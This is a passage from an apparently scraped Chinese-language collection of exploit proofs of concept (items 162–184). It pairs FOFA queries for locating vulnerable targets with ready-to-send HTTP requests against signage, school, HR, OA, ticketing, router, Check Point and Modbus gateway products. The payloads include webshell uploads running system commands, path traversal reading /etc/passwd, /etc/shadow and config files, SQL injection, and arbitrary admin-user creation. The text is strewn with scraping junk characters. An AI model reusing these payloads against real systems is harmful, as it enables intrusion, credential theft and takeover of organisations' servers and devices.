6 g6 o4 ~: Y4 sxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" K3 r6 u3 E% B% L2 P+ t) s5 a8 g
<soap:Body>6 y( d# l/ Q( e0 q, l/ k
<UploadResume xmlns="http://tempuri.org/">+ @( f: O: L' j. @
<ip>1</ip>
, |% W( H, x5 w8 F) s<fileName>../../../../dizxdell.aspx</fileName>8 O) k3 @# S( Q3 K
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
' h' G" a7 L. [<tag>3</tag>3 g. u2 ^5 Y5 R7 C0 Q% Y5 m k
</UploadResume>7 O" s4 T8 M8 o; f
</soap:Body>2 p' e# s4 Q" p, D( w! Z
</soap:Envelope>
9 S2 ~0 e- [ j& f& }& d
$ m: ^6 o1 n, H- O; u' @
$ H( U4 f* U: D: ^+ W$ nhttp://x.x.x.x/dizxdell.aspx1 h2 @' U7 f/ x l9 k" F. t, Y0 L
9 Y! R+ M" |- G; ? f) i2 ]! a8 b
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
1 v0 `) j# m: v, t9 W t1 SFOFA: app="和丰山海-数字标牌"
: l! x2 L$ g% L* XPOST /QH.aspx HTTP/1.16 D- P. E0 \: Y( {7 |
Host: x.x.x.x
& E9 N6 P6 v+ @ [5 J3 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0; d- B( A0 x, C! c2 G# Q
Connection: close
' M( Z& S. K6 U3 t8 `% q$ H" mContent-Length: 583
: Y; e, l& }, w0 }8 l2 P: ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey: I& q8 @" q# O/ @3 N3 e
Accept-Encoding: gzip
1 V" f: k) }- ~( j. C" g! }6 F J) W1 R0 e
------WebKitFormBoundaryeegvclmyurlotuey0 o* H- m/ u" y- H+ ?, I: P6 Y
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"% ]9 h" |) p3 L6 d9 z0 s: ?# k
Content-Type: application/octet-stream
9 p* b, ~* V6 `, r& P3 Q0 g6 W' o6 i! c
<% response.write("ujidwqfuuqjalgkvrpqy") %>
. A( J x1 m9 k------WebKitFormBoundaryeegvclmyurlotuey
( ~; k9 e! `: ^+ R9 [: V& H) YContent-Disposition: form-data; name="action"
' Y+ |- | S/ \. I Z' U' |" J$ }' G* H [3 S$ l
upload
/ M1 x7 g, ^- p------WebKitFormBoundaryeegvclmyurlotuey
& o7 {! ?- M$ p+ ~Content-Disposition: form-data; name="responderId"/ ?& I" r: r* K' u" D' \
8 N* n @' k2 k1 _8 XResourceNewResponder9 e. ^8 U8 ~% ~; n( w6 r( f
------WebKitFormBoundaryeegvclmyurlotuey9 j" X6 O& O! }8 \3 e
Content-Disposition: form-data; name="remotePath"' }4 W6 q; O4 s# M
4 i! [4 N( ~( y0 e/opt/resources
" x7 \- N: v. s3 m1 K------WebKitFormBoundaryeegvclmyurlotuey--& @ T$ L; [2 K: Q7 Z
" B2 g: Y! v" N: E7 a+ }& k' s9 v8 b% O
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
3 D& f( @5 d4 t) G1 f2 V5 w6 [8 e8 l2 Z
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传3 J8 m6 ~& E8 O) `) A6 T# r K
FOFA: icon_hash="-795291075"+ a% G# v( D! T' A: Y
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
[5 }" }' W: V7 x& YHost: x.x.x.x! ? Q3 \9 E8 n* N" ]: K, S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
5 k% o* s+ x1 s# i& ]% D- NConnection: close3 }+ _0 x2 t" B7 h% K: H3 z5 b
Content-Length: 2933 C* y8 f/ }" u, s. [
Accept: */*
0 o0 } ?& p* ?8 I( V2 R$ cAccept-Encoding: gzip, deflate# A! v0 @% i7 Z9 T" k
Accept-Language: zh-CN,zh;q=0.9+ D! U0 B T6 _( Y. ?( ^8 a/ N# X
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
, s' |$ S* @/ ~# a8 A; D5 o, X
4 c( I7 `& C* e$ U/ j; l" t/ g------iiqvnofupvhdyrcoqyuujyetjvqgocod
5 V; q+ A: D! X/ C( ]+ J$ UContent-Disposition: form-data; name="name"" w' l5 M) u2 x, @+ N7 \- `
2 X4 W7 Q3 v7 r! k/ i/ W( [1.php
8 I/ ^+ \: ]: n' c; ^ v------iiqvnofupvhdyrcoqyuujyetjvqgocod
1 H" r Z: o( r6 n* |Content-Disposition: form-data; name="upfile"; filename="1.php"
- H7 q1 M" J- R3 ~- C1 }1 o( SContent-Type: image/jpeg
1 j7 a: F; \' e" i8 t5 |8 h% s
P) m6 U5 h* z' {* Q% hrvjhvbhwwuooyiioxega
$ c& @( F3 l1 k------iiqvnofupvhdyrcoqyuujyetjvqgocod--" w9 _: F+ m- u/ r: j `9 O& m
! |4 F9 D8 X; D2 W( s: G. W. u$ e$ o( s1 f
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传7 n5 g C% W3 P
FOFA: title="智慧综合管理平台登入"7 Z' b" P+ B4 n( d+ p9 D
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1 A8 l* Y: o! N
Host: x.x.x.x
$ U2 r; G( C3 j- R, h! b0 ~& sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.03 C2 Y, z: }0 L. m4 Z! g m( [
Content-Length: 288/ t* a6 z$ N. ]
Accept: application/json, text/javascript, */*; q=0.01
2 M# S# _3 g1 l8 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,9 \: {, O( R) w3 N9 {
Connection: close4 ]) ?; T, v2 \' Z) H# S' k
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl! O. n4 x( s( y' ]
X-Requested-With: XMLHttpRequest
" n; M$ [! B# Y: Y! WAccept-Encoding: gzip
$ f: g$ y5 g" _3 C
/ G3 w1 Y# R5 a0 q------dqdaieopnozbkapjacdbdthlvtlyl
/ X8 H/ @- `- R3 Q9 I% xContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
& {( K' N/ p0 i1 W. s/ L! h1 eContent-Type: image/jpeg8 h" U, o8 K5 [( P @1 E! r% U
5 D) R7 i+ X' J3 i4 E8 T% d
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
: V6 e3 j% x' N! z& T; n------dqdaieopnozbkapjacdbdthlvtlyl--0 L, K# V" z: x
/ D7 N+ G! d4 N& }4 i, P, h* X) Q$ d; |' `0 ?
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
4 b. Q c8 N* w/ u6 Q; n+ l! J" t' N. q! X7 v' D& K# r1 b
165. OrangeHRM 3.3.3 SQL 注入
! [8 x8 r5 p+ w" ~CVE-2024-364289 R/ Q# `2 f- P* Y
FOFA: app="OrangeHRM-产品"
9 V3 F. s: h) X% mURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
( b$ X6 x: \& |: O
; r- ` c" s) w) s9 T0 ]
, q% Q7 d% o1 @7 ~0 X' A166. 中成科信票务管理平台SeatMapHandler SQL注入
, b. q9 f: y7 c& ~FOFA:body="技术支持:北京中成科信科技发展有限公司"$ q$ ]6 g! i* R; x- ^; Q9 r
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
3 d* h- J3 e7 a- g1 HHost:- m0 d! J/ z- [# d# @7 W7 Z
Pragma: no-cache# W0 I" P: F5 @# \+ D- W
Cache-Control: no-cache
" F/ K5 I$ w; Z: _# a1 q& q+ wUpgrade-Insecure-Requests: 1! K: b& r4 J. ~/ t1 B: F* \) L: X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
* [- j- z; U1 d' OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ h3 t( z: `6 h' F$ m% P
Accept-Encoding: gzip, deflate
+ V. @' S7 Y' O( @% JAccept-Language: zh-CN,zh;q=0.9,en;q=0.81 u$ y4 g" s: a' @, B ~
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
# B4 S, j2 l& Z# n* F1 s; }Connection: close
& Q' S8 g# r& p5 `Content-Type: application/x-www-form-urlencoded" D: H4 g# j2 n& v( v+ s; z
Content-Length: 89
: E% C/ P4 \2 d) H2 X5 T" E1 o- F5 ~$ z' U: t; [. ?9 t
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
; F" \0 R1 s9 G3 s. h* A; n8 R' y; E
: }7 ~9 b5 Y6 ]5 h+ ?+ z3 F6 e- a167. 精益价值管理系统 DownLoad.aspx任意文件读取 c. ^+ U$ F: _: N" C7 C4 {* R
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
& q' q" i, h4 Z! M6 w! Y' CGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
0 H) H4 u# n! [6 lHost:- L7 T! R6 m; |( m. E6 Z7 G4 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ ~( `" G% N: K3 d+ ~) O5 w/ a- w
Content-Type: application/x-www-form-urlencoded
7 r: s9 d3 V) ^/ yAccept-Encoding: gzip, deflate
4 l9 H: s+ y( [% {2 _# wAccept: */*
( r! p% Z/ n$ v2 i6 W* i8 r! S! o4 HConnection: keep-alive
, P6 r; O- M; U' F, V2 r/ h# t! O
9 ~% ^$ K% o0 J! p1 \+ `5 K. K- d, Z) P9 \7 K% ]( c
168. 宏景EHR OutputCode 任意文件读取6 q! S) x. o# [8 p
FOFA:app="HJSOFT-HCM"
8 E0 L4 t y8 v9 O7 {5 lGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.11 c0 l6 x: r' c3 x! T
Host: your-ip
; R: C, G. M% i4 M7 _9 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" b3 t- m7 p9 S& U5 s, I' r
Content-Type: application/x-www-form-urlencoded6 g% g% d, u/ Z) G9 O9 l/ S
Connection: close
/ ?! z ], i9 @: d7 Z( Y/ {2 u
+ V) P8 ^0 g" P* m/ R' L g1 L5 q& i9 k8 J& s$ P9 [" F
: y& X" w0 u( J) [
169. 宏景EHR downlawbase SQL注入
2 ?, R* H' A3 tFOFA:app="HJSOFT-HCM"# v4 n# W, `1 Y& E$ F7 D
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1, Y' k% p7 A X$ l- C& g4 ?" X( D
Host: your-ip
! Y( D! J4 [9 i: BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 l# U( T3 U/ R0 F
Accept: */*7 U- R2 ?, {) Q4 I% s
Accept-Encoding: gzip, deflate
- k# v) A# s+ L* {" n9 mConnection: close% Z/ n$ _0 p: f+ C" q
! l) c s8 O0 z; n f3 Q9 k1 V
& ] ~0 s$ C! T8 }" [1 a. W# J5 V8 C8 q( s3 j. G$ X
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
# F, K% l' Q# P' L9 E& SFOFA:body="/general/sys/hjaxmanage.js"8 g/ C! }* T7 \% P' f
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
% A% \2 W+ T# N7 MHost: balalanengliang
" r& [( n, d$ b: BUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
p5 }2 Y- Z# U" a mContent-Type: application/x-www-form-urlencoded
1 U( j, Q- E7 _. Z' ]3 ?
/ @( y2 C! L; n% Z2 n: Gfilename=../webapps/ROOT/WEB-INF/web.xml5 d( Z( D: J- U3 V# Z% a8 o8 l
# M7 e. Z; S- O: a4 `) t+ ^7 d1 g; o* N3 j5 o) `( Y$ F4 |
171. 通天星CMSV6车载定位监控平台 SQL注入8 W! ~+ m) ~% y% L L
FOFA:body="/808gps/"' _7 F4 x7 A% T
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
9 c( N6 p/ b) `, e3 rHost: your-ip: D5 f# X, c/ t6 r) i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0- M! J3 j9 ?& D" e5 a% U
Accept: */*
( ]7 b* o* i' ^ U5 C. pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, `: u. K3 f0 o1 d2 g2 {; tAccept-Encoding: gzip, deflate0 _ A, E) F: X8 T6 Z! c& D6 b
Connection: close
9 f# e& W! o3 E' `2 f, \, [
. R! Y/ A; ]7 @, F. d. n
( r! U' |( m- C
t" i/ z7 |2 ]6 S# W# _172. DT-高清车牌识别摄像机任意文件读取
8 Q6 J! @$ ^( S' n) }FOFA:app="DT-高清车牌识别摄像机"
1 Q3 I. S7 s$ Q0 ?3 L' vGET /../../../../etc/passwd HTTP/1.13 ^9 \* @* k$ x9 W& q
Host: your-ip- {* ^8 f# c- ~2 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! `/ x/ d! `$ L) i2 N0 [3 d
Accept-Encoding: gzip, deflate* E1 H9 Y! ~8 u4 X4 B9 ~; u
Accept: */*9 s ^% _5 o1 P4 i \
Connection: keep-alive
' P( K" U! L2 v2 u( D) }: N2 u5 }3 {) ~' X* m7 E' f. R2 ]
4 L; E" @3 I1 Z: @' B
8 J, z* I# c; C1 i+ n, s4 |173. Check Point 安全网关任意文件读取
+ r+ z8 g/ r5 y& k L7 PCVE-2024-24919
' W8 G/ G/ F2 j+ ?9 sFOFA:app="Check_Point-SSL-Network-Extender"3 \+ @- w- l6 p v r: N
POST /clients/MyCRL HTTP/1.1' `# W' z7 O2 B
Host: your-ip9 w/ n+ t) N; G: A
Content-Type: application/x-www-form-urlencoded
; B; @# y2 K1 Z1 [! A
' F" X; z1 H$ f; F2 GaCSHELL/../../../../../../../etc/shadow8 u. f. M! U8 ^3 d' d
' |+ ]! w- w9 W$ o# P7 J+ h8 s5 [& u0 ]6 T7 |, }( {8 D
5 u6 W4 D* l, n4 h174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 M+ u* \+ \0 y
FOFA:app="金和网络-金和OA"
+ m8 i! d e* ]: x! r% @4 [GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1) M$ M8 d8 n q
Host: your-ip
/ X0 v# g) w; D1 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ a/ n% L- ~1 U0 _$ ? G& t4 I2 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 X1 L* S3 ^% ^ s4 _Accept-Encoding: gzip, deflate, br
3 u4 L6 O* c' n+ sAccept-Language: zh-CN,zh;q=0.9: v& B+ r& l: |, m3 J- c" E
Connection: close
! G9 E7 h+ C& |. R: t5 P
9 z, e/ `; C( l. \! `1 i& _+ q1 b3 ?1 `& N
% t* n+ v$ ^4 {* a
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入# a9 Z/ O6 `; s/ X, C: V7 h4 j! w
FOFA:app="金和网络-金和OA"4 J" Y# a. L: u+ U, b, n7 W
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.10 h h% d: d) Z3 ~4 F% } W
Host:6 Y* R% `* K; [ W
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 h. ^8 i6 E8 z3 H8 Y. v. uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 ~- P0 d# y4 s0 A# E! C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& P4 ~& ~9 [# dAccept-Encoding: gzip, deflate
& f% Z# _& Q7 i5 U" b! DConnection: close0 ]0 S7 r" ^3 k) s7 c
Upgrade-Insecure-Requests: 14 y" i7 W" c* J. z7 {; v
" @" \ j, @8 j- \$ Y' F7 C
6 j' {5 s) S' |! R+ x, p
176. 电信网关配置管理系统 rewrite.php 文件上传, S: D1 i. `- c1 L/ }2 J. s
FOFA:body="img/login_bg3.png" && body="系统登录"
1 _( p, V6 Q$ ~! d( i: MPOST /manager/teletext/material/rewrite.php HTTP/1.1
! F- l0 ^ B0 ~) d2 Z- jHost: your-ip0 D$ x; u. a# M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
: G8 B) M2 [* W# L9 l$ b' ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
$ ?% z& R) Q3 g* K, i: uConnection: close4 X# T2 k& e' q% p3 b) f
0 }5 z$ o& _. i- A2 \! Y------WebKitFormBoundaryOKldnDPT
7 B3 b: h$ a; ?4 Q, l: X/ yContent-Disposition: form-data; name="tmp_name"; filename="test.php"
9 k( s% R" L) O$ k: V6 i- ]& LContent-Type: image/png- Y% ]+ M1 S i
3 k1 B$ ~: `' h7 u$ ?" X, [
<?php system("cat /etc/passwd");unlink(__FILE__);?>& E X# V8 g3 \; L0 ?6 z
------WebKitFormBoundaryOKldnDPT! R! y% ^- g- ]2 R( @( q, H
Content-Disposition: form-data; name="uploadtime"( K& l+ k, O- ~8 z1 s. B
4 _% {! e. a v% V* s9 Z4 n n
4 L8 R5 d/ a% v, i- `# Q3 Q% [
------WebKitFormBoundaryOKldnDPT--
7 U- t! q, ]9 a, R+ ]9 b! |! z, N
+ {" V4 {! Y) J0 o) M0 J$ y O* J) j+ g
1 U2 F$ A1 W6 H: r$ |. }8 {& M
177. H3C路由器敏感信息泄露
9 i2 E! }. e5 \7 r4 e" l/ y! W) ~/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg( b8 [& `: ^- s1 L8 Q$ n/ X% F
/userLogin.asp/../actionpolicy_status/../M60.cfg
; {( s+ V% f6 A% N p/userLogin.asp/../actionpolicy_status/../GR8300.cfg
. F' h) a7 n& y) D/ S3 \/userLogin.asp/../actionpolicy_status/../GR5200.cfg
q1 ]3 F; Z7 |+ w, }# ^/userLogin.asp/../actionpolicy_status/../GR3200.cfg; s* J( y9 W% |8 W# y, |, H% ?" s# u% S
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
, c1 g1 D3 ? l! g/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg. }, ?% F: R5 R% j+ ?( T! K" g
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg6 P) T8 o& C3 C0 R2 d8 h' ]
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
4 r* q0 @5 _3 O4 O/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
# y3 [6 H0 G! g% t3 {! A/userLogin.asp/../actionpolicy_status/../ER5200.cfg5 ~) E+ n' R) T5 R* z; h" G2 R- k
/userLogin.asp/../actionpolicy_status/../ER5100.cfg7 V& l. c% v) f, ^5 }- }& U
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
: m) t% ]" o! |" Z- W8 [/userLogin.asp/../actionpolicy_status/../ER3260.cfg
6 @( H6 ]: N1 f/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg/ z: ]/ o0 w# v: z9 d2 m' i
/userLogin.asp/../actionpolicy_status/../ER3200.cfg4 O/ Y. h/ G3 c/ h$ o
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg" ?' ~7 P U# ?% ?) W, q4 \9 j! A6 k
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg D* m8 c: o+ K d" v
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
, E& h- `' d" K% x/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/ Q. f5 i/ a$ D3 H: g* ?& ]/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
6 l; m5 Q, a8 ~9 c; r5 y/ @1 [4 \* ~; S" w w+ E; Q$ ]
" l& V" y9 q- j
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
6 I# r+ ?2 B( @) |' E' sFOFA:header="/selfservice": P& w+ t5 O4 t2 l- Q( o
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.15 U! F; `+ W& J! T- a, _. d# `& V
Host:
- S' p8 O/ c/ K1 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 x6 k: |' U4 a5 u6 cContent-Length: 252
9 t6 Q, ]2 o/ _2 F; wAccept-Encoding: gzip, deflate H% J% P1 A9 k f w3 ]2 F
Connection: close
, m9 N {( K; NContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
6 |$ B; g" R# }2 Q3 }3 L; e-----------------aqutkea7vvanpqy3rh2l! K( P1 o( v" Y
Content-Disposition: form-data; name="12234.txt"; filename="12234"7 P5 D U- s6 g1 @! G0 J/ P
Content-Type: application/octet-stream
) {7 y* n/ T4 \/ e2 x% qContent-Length: 255
]2 _! ?2 \! V# P" A Q7 U9 r) s6 X. z3 g1 Y
12234
9 o" J8 B8 G; G/ w1 D-----------------aqutkea7vvanpqy3rh2l--
V- ]) d0 V, {9 W+ a/ N$ T% _
2 S! S7 C6 \: I7 X5 J$ y ^7 X# s9 Y
GET /imc/primepush/%2e%2e/flex/12234.txt# q. s& n+ x) F8 n, ^* A6 G
5 k* c! a0 ^9 L) [( R
. z+ ]- O# {! o
179. 建文工程管理系统存在任意文件读取
9 P. N: K! \. Q; IPOST /Common/DownLoad2.aspx HTTP/1.16 u5 X8 X' Z4 k( j( T6 k
Host: {{Hostname}}
3 h" d o, x1 n _' V0 i2 Z/ BContent-Type: application/x-www-form-urlencoded
( D0 X* F0 R0 Y1 E0 |: F3 HUser-Agent: Mozilla/5.0
9 Q8 k+ H8 I7 _, m* c/ q/ A/ ?! S7 m O* J' s$ u1 y7 @
path=../log4net.config&Name=: @ @% v, z" r5 ~6 K
9 \8 G8 k8 M* ~) o( |# j: n
; E( }' [8 y) [; u7 i0 D' E180. 帮管客 CRM jiliyu SQL注入1 T/ N$ L; M$ \8 i- b: i' i
FOFA:app="帮管客-CRM"
. F# `: q9 K( gGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1* E7 r* D( x9 e. |' h* k9 i
Host: your-ip& x" P" Q4 M8 l& j) g: A' A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; q! B1 W8 P* Z" aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" ^/ \, ^. O( U0 C |8 K l
Accept-Encoding: gzip, deflate2 c) Q. c8 ?. t5 y. C# o) F' g8 R
Accept-Language: zh-CN,zh;q=0.9" y: }$ w& s2 F/ h. J
Connection: close0 L0 b, E7 i+ y: |; s
6 ?, v) u/ P( `# G, o1 h
$ |. `# {5 J/ f0 W181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
, s' R" c% N# r7 r1 C$ X1 _FOFA:"PDCA/js/_publicCom.js"
+ e2 ~1 a% t: a8 |9 o: RPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
# c0 l6 A! D7 j) V8 u! _+ v4 aHost: your-ip3 S& O" e, ]+ E$ O @7 N4 V5 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.362 Z1 i5 C/ B2 ?9 K( p1 q* d2 P+ @% S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. h# ]3 L& T" X7 t. Q7 a2 X5 i" XAccept-Encoding: gzip, deflate, br1 b$ q, q% K. J1 z6 G/ d
Accept-Language: zh-CN,zh;q=0.9
5 u. \, n! R1 R p) D$ W% {Connection: close( [, u) \* z" e% w1 y
Content-Type: application/x-www-form-urlencoded. i0 l! q1 t" b& A( X) O& r+ I
_5 W, {) U J. a
6 h- c3 I. @6 b% aaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20+ p' w' a" j7 z" S+ j$ X! q! K
" Y* q0 f7 w- G! r( [ f k2 |( f3 s6 B2 Z! _2 I$ k
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
. j5 V, U! t( J' NFOFA:"PDCA/js/_publicCom.js"
4 H$ y9 N; m% C5 JPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.18 z9 |8 f3 ^5 k* v0 U* t
Host: your-ip8 l* @" ^6 K7 @% j; F% W/ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36( I' {: @8 X. |) P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( u; i2 ]4 v, ]* J; T
Accept-Encoding: gzip, deflate, br
/ \2 z& E: U/ z# c: s& kAccept-Language: zh-CN,zh;q=0.91 r( f1 Z* L1 Q
Connection: close6 X% x# Q! x( R; x7 M
Content-Type: application/x-www-form-urlencoded
+ d" N4 i0 t6 K/ W* Y% u: G
4 p2 C, S/ G9 i/ P0 U7 D2 A+ @1 g9 c9 X: ]; Y# r
username=test1234&pwd=test1234&savedays=1# B1 A% S- C3 m' X
h; e. }9 W, Q" d" C; [
# O+ |. H1 h% H" a7 Y2 ^
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入2 A% S; R% k% n) z7 X; U1 h
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面": F8 Q) j2 j. }5 Y" J
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
! h F+ P {" A/ q6 {Host: your-ip4 N% t7 l& q* i; t
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
/ l- E8 J5 K2 u! }6 qAccept-Charset: utf-8
% S; F" ^' i6 u0 VAccept-Encoding: gzip, deflate
7 q' |8 a3 S! EConnection: close; V C/ L0 G9 k; J! V( m# F8 p5 M
0 {) S0 _* }( W
8 e- N& j8 k7 q' s9 H1 O184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
2 X" n w/ }, ?2 B# FFOFA:server="SunFull-Webs"& ?6 M4 d! P# H' J5 m* L
POST /soap/AddUser HTTP/1.1
. a) @1 |8 J5 P6 a gHost: your-ip
! E" |+ I, ]$ qAccept-Encoding: gzip, deflate: o3 ~# z# b9 w/ e- F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 l) ^* |* C( U
Accept: application/xml, text/xml, */*; q=0.01/ c* }! W$ K' |# |9 _& S
Content-Type: text/xml; charset=utf-8
; F# E* I n( i) UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 e& Q/ O k* Z! b" ]8 I- D; w" S
X-Requested-With: XMLHttpRequest
+ {5 c P' Z h/ m& w9 ~5 |5 V+ |9 D0 O& c3 A3 o5 p4 O
1 ^: _7 u2 E8 ~insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
1 |/ H2 {. j0 j+ R. L! ` p: Z
